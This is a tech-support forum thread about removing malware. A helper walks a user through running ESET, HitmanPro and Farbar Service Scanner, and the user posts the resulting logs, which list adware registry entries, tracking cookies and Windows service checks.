Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)



#10 TsVk!

TsVk!

    penguin farmer


  • Members
  • 6,234 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Antipodes
  • Local time:03:03 AM

Posted 26 October 2016 - 12:06 AM

Hi jumpman17,

 

Did you configured manually that you don't receive notifications to install non-Windows software? Do you want it to remain like this?

Did you configured manually that your Downloads folder appears in your start menu? Do you want it to remain like this?

 

Please follow these instructions.

 

eset-mobile-security_5619.png?width=64&h  ESET Online scanner

 

Follow this link or right click and "copy link location", then paste the link into the address bar on your newly opened browser instance

  • click "SCAN NOW"

Note: If using Mozilla Firefox you will need to download esetsmartinstaller_enu.exe when prompted then double click on it to install.

  • Firstly, Accept the Terms and click Start
  • Click Enable detection of potentially unwanted applications
  • Do not change any of the Advanced options
  • Click Scan.

ESET will then download updates and begin scanning your computer. Please be patient as this can take some time.

  • When the scan completes click Save to a text file and save it to your desktop. Note: If no malware was found you will not get a list.
  • Click Do not clean
  • Check Remove application data and then click Finish
  • Please copy the log in your reply.

149nkg7.jpg Please download Farbar Service Scanner and run it

  • Please check all of the boxes then click Scan
  • It will create a log (FSS.txt) in the same directory the tool is run.
  • Please copy and paste the log into your reply.

Please include in your reply

  • answers to the questions about your system settings
  • ESET log
  • FSS log

TsVk!



#11 jumpman17

jumpman17
  • Topic Starter

  • Members
  • 25 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:12:03 PM

Posted 27 October 2016 - 07:18 AM

I'm having a problem running the ESET Online Scanner. I've tried twice now. It gets about 75% of the way through, and then everything on the eset program disappears and it's just a grey window with a minimize and close button in the corner. It seems to continue scanning as the progress bar continues on my start bar. I've let it finish but the window is still blank. Before the contents of the window disappear, it had found a few items up until that point. The second time I ran it I even made sure that no other programs were running in the background and did not use the computer at all, but it still had the same result.



#12 TsVk!

TsVk!

    penguin farmer


  • Members
  • 6,234 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Antipodes
  • Local time:03:03 AM

Posted 27 October 2016 - 05:21 PM

That happens sometimes....

 

Did you configure manually that you don't receive notifications to install non-Windows software? Do you want it to remain like this?

Did you configure manually that your Downloads folder appears in your start menu? Do you want it to remain like this?

 

Hitman-Pro-Icon.png  Please download Hitman Pro, choose 32bit or 64bit depending on your Windows version. If you are unsure click here

  • Run the installer and click Next
  • Accept the terms and click Next
  • Select "No, I only want to perform a one time scan to check the computer"
  • Click Next to start the scan
  • When completed click Save Log, adjacent to the green "Buy Now" button, and then save the log.
  • Copy and paste the content of the log into your reply.

149nkg7.jpg Please download Farbar Service Scanner and run it

  • Please check all of the boxes then click Scan
  • It will create a log (FSS.txt) in the same directory the tool is run.
  • Please copy and paste the log into your reply.

Please include in your reply

  • answers to the questions about your system settings
  • Hitman log
  • FSS log

TsVk!


Edited by TsVk!, 27 October 2016 - 05:26 PM.


#13 jumpman17

jumpman17
  • Topic Starter

  • Members
  • 25 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:12:03 PM

Posted 27 October 2016 - 06:07 PM

Did you configured manually that you don't receive notifications to install non-Windows software? Do you want it to remain like this?

I'm not entirely sure what your asking, but I don't think I ever changed anything like this.

 

Did you configured manually that your Downloads folder appears in your start menu? Do you want it to remain like this?

I did not configure this, but I don't even see a Downloads folder anywhere in my start menu.

 

-------------------------------------------------------------------------------------------------------------------------------------------------

 

HitmanPro 3.7.14.280
www.hitmanpro.com

   Computer name . . . . : KEVIN-PC
   Windows . . . . . . . : 6.1.1.7601.X64/2
   User name . . . . . . : Kevin-PC\Kevin
   UAC . . . . . . . . . : Disabled
   License . . . . . . . : Free

   Scan date . . . . . . : 2016-10-27 18:24:32
   Scan mode . . . . . . : Normal
   Scan duration . . . . : 7m 52s
   Disk access mode  . . : Direct disk access (SRB)
   Cloud . . . . . . . . : Internet
   Reboot  . . . . . . . : No

   Threats . . . . . . . : 0
   Traces  . . . . . . . : 172

   Objects scanned . . . : 2,959,569
   Files scanned . . . . : 49,376
   Remnants scanned  . . : 487,937 files / 2,422,256 keys

Miniport ____________________________________________________________________

   Primary
      DriverObject . . . : FFFFFA80045C1E70
      DriverName . . . . : \Driver\atapi
      DriverPath . . . . : \SystemRoot\system32\drivers\atapi.sys
      StartIo  . . . . . : 0000000000000000 +0
      IRP_MJ_SCSI  . . . : FFFFFA800442E2C0 +0
   Solution
      DriverObject . . . : FFFFFA80045C1E70
      DriverName . . . . : \Driver\atapi
      DriverPath . . . . : \SystemRoot\system32\drivers\atapi.sys
      StartIo  . . . . . : 0000000000000000 +0
      IRP_MJ_SCSI  . . . : FFFFF88000DC44D8 \SystemRoot\system32\drivers\ataport.SYS+29912

Suspicious files ____________________________________________________________

   C:\Users\Kevin\Desktop\virusfix\FRST64.exe
      Size . . . . . . . : 2,407,424 bytes
      Age  . . . . . . . : 8.8 days (2016-10-19 00:11:22)
      Entropy  . . . . . : 7.6
      SHA-256  . . . . . : D716445A0AECB02C49F5E33D9D8B0BC34AA0F0BAF4DFAFBD51ABFBC7C36A39B7
      Needs elevation  . : Yes
      Fuzzy  . . . . . . : 23.0
         Program has no publisher information but prompts the user for permission elevation.
         Entropy (or randomness) indicates the program is encrypted, compressed or obfuscated. This is not typical for most programs.
         Authors name is missing in version info. This is not common to most programs.
         Version control is missing. This file is probably created by an individual. This is not typical for most programs.
         Time indicates that the file appeared recently on this computer.


Potential Unwanted Programs _________________________________________________

   HKLM\SOFTWARE\Classes\Interface\{6E780F0B-BCD6-40CB-B2DB-7AF47AB4D4A4}\ (CouponBar)
   HKLM\SOFTWARE\Classes\Interface\{78CE34FD-F6D4-4866-B79C-A37268D06A04}\ (WinToFlash)
   HKLM\SOFTWARE\Classes\Interface\{80904944-C726-4C7D-A452-3FFF2A882095}\ (WinToFlash)
   HKLM\SOFTWARE\Classes\Interface\{A138BE8B-F051-4802-9A3F-A750A6D862D4}\ (CouponBar)
   HKLM\SOFTWARE\Classes\Wow6432Node\Interface\{B3E37FAA-3669-4212-A35D-157BF70ADC04}\ (CouponBar)
   HKLM\SOFTWARE\Classes\Wow6432Node\Interface\{E755701B-A61B-4194-8902-17A61C4C1672}\ (CouponBar)
   HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{1A53AD8B-D0B9-4E7F-88E4-50C07A65F2DC}\ (CouponBar)
   HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}\ (CouponBar)
   HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{1A53AD8B-D0B9-4E7F-88E4-50C07A65F2DC}\ (CouponBar)

Cookies _____________________________________________________________________

   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:1369090036.log.optimizely.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:2452580572.log.optimizely.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:254a.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:4sex4.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:a.scorecardresearch.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:aaaautoclubsouth.demdex.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:abmr.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:acuityplatform.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:acxiom-online.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:ad.360yield.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:ad.dmm.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:adbrn.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:addthis.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:adfarm1.adition.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:adform.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:adgrx.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:adhigh.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:adingo.jp
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:adnxs.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:ads.avocet.io
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:ads.creative-serving.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:ads.deliverimp.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:ads.kiosked.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:ads.linkedin.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:ads.pubmatic.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:ads.stickyadstv.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:ads.topsrvimp.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:ads.traffichunt.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:ads.undertone.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:adscale.de
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:adserver.exoticads.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:adsrvr.org
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:adsymptotic.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:adtech.de
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:adtechjp.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:adtechus.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:adzerk.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:agkn.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:angsrvr.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:api.virool.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:at.atwola.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:atemda.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:basebanner.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:bidr.io
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:bidswitch.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:bluekai.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:bs.serving-sys.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:c.appier.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:chango.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:collective-media.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:connexity.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:contextweb.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:crwdcntrl.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:ctnsnet.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:d.adroll.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:demdex.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:desigirlsex.info
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:dish.demdex.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:dmtry.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:domdex.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:dotomi.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:dpclk.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:dpm.demdex.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:dynamicyield.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:effectivemeasure.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:erne.co
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:ero-advertising.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:eset.tt.omtrdc.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:everesttech.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:exoclick.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:eyereturn.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:eyeviewads.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:fandangollc.demdex.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:flashtalking.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:bleepgames.xxx
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:genieesspv.jp
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:go.sonobi.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:googleadservices.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:gssprt.jp
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:gwallet.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:hearstmagazines.112.2o7.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:ib.mookie1.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:ih.adscale.de
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:imrworldwide.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:ipredictive.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:krxd.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:legolas-media.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:lijit.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:link.krxd.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:livejasmin.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:liverail.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:match.adsby.bidtheatre.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:match.rundsp.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:mathtag.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:media6degrees.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:ml314.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:mookie1.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:mtvn.demdex.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:mxptint.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:naked.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:nexac.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:openx.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:optimatic.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:outbrain.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:owneriq.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:ox-d.cbs.servedbyopenx.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:ox-d.imgur.servedbyopenx.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:ox-d.wikia.servedbyopenx.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:pixel-a.sitescout.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:pixel.rubiconproject.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:pixel.sitescout.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:po.st
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:pool.admedo.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:postrelease.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:pubmatic.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:revsci.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:rfihub.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:rlcdn.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:ru4.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:rubiconproject.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:sa.scorecardresearch.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:samsungelectronicsamericainc.demdex.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:scorecardresearch.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:see.xxx
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:server.cpmstar.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:servesharp.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:serving-sys.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:sex.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:simpli.fi
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:sitescout.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:skimresources.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:smartadserver.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:st.ipornia.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:stat.komoona.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:swid.switchads.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:sxp.smartclip.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:taboola.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:tap-secure.rubiconproject.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:tap-t.rubiconproject.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:tap.rubiconproject.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:tap2-cdn.rubiconproject.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:tapad.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:tidaltv.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:track.apptracking-landing-offer.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:trc.taboola.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:tremorhub.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:tribalfusion.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:tubemogul.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:turn.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:univide.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:vindicosuite.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:virool.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:visualdna.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:vivaki.demdex.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:w3counter.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:w55c.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:warnerbros.112.2o7.net
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:wtp101.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:www.googleadservices.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:www.sex.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:www.w3counter.com
   C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\cookies.sqlite:yadro.ru

 

-------------------------------------------------------------------------------------------------------------------------------------------------

 

Farbar Service Scanner Version: 27-01-2016
Ran by Kevin (administrator) on 27-10-2016 at 18:57:35
Running from "C:\Users\Kevin\Desktop\virusfix"
Microsoft Windows 7 Ultimate  Service Pack 1 (X64)
Boot Mode: Normal
****************************************************************

Internet Services:
============

Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.


Windows Firewall:
=============

Firewall Disabled Policy:
==================
"HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\\EnableFirewall" registry value does not exist.


System Restore:
============

System Restore Policy:
========================


Action Center:
============

Action Center Notification Icon =====> Unable to open HKLM\...\ShellServiceObjects\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A} key. The key does not exist.


Windows Update:
============

Windows Autoupdate Disabled Policy:
============================


Windows Defender:
==============

Other Services:
==============
Checking FirewallRules of SharedAccess: ATTENTION!=====> Unable to open "SharedAccess\Defaults\FirewallPolicy\FirewallRules" registry key. The key does not exist.


File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcore.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\SDRSVC.dll => File is digitally signed
C:\Windows\System32\vssvc.exe => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
